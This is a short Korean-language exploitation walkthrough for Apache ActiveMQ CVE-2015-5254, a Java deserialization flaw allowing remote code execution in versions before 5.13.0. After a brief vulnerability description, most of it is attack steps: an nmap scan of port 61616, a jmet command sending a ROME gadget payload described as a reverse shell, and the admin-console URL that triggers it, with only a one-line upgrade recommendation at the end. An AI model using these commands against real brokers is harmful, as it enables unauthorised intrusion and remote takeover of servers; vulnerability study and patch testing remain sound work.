
ActiveMQ_CVE-2015-5254
취약점 설명: Apache ActiveMQ 5.13.0 이전 5.x 버전에는 보안 취약점이 존재합니다. 이 취약점은 프로그램이 브로커(broker)에서 직렬화할 수 있는 클래스를 제한하지 않는 데서 발생합니다. 원격 공격자는 특수하게 조작된 직렬화된 Java Message Service(JMS) ObjectMessage 객체를 이용해 이 취약점을 악용하여 임의 코드를 실행할 수 있습니다.
영향받는 버전: Apache ActiveMQ 5.13.0 이전의 5.x 버전
0x01 관리 콘솔에 로그인하여 버전 확인: http://IP:8161

0x02 61616 포트가 열려 있는지 확인:
nmap -sV -Pn -T4 -sC -p 61616 IP

0x03 리버스 셸(reverse shell) 페이로드 전송:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616

0x04 Browse event-Message ID를 클릭하여 트리거하면 리버스 셸에 성공:
http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event

수정 권장 사항: 최신 버전으로 업그레이드하고 WAF 관련 규칙을 구성하여 차단하십시오.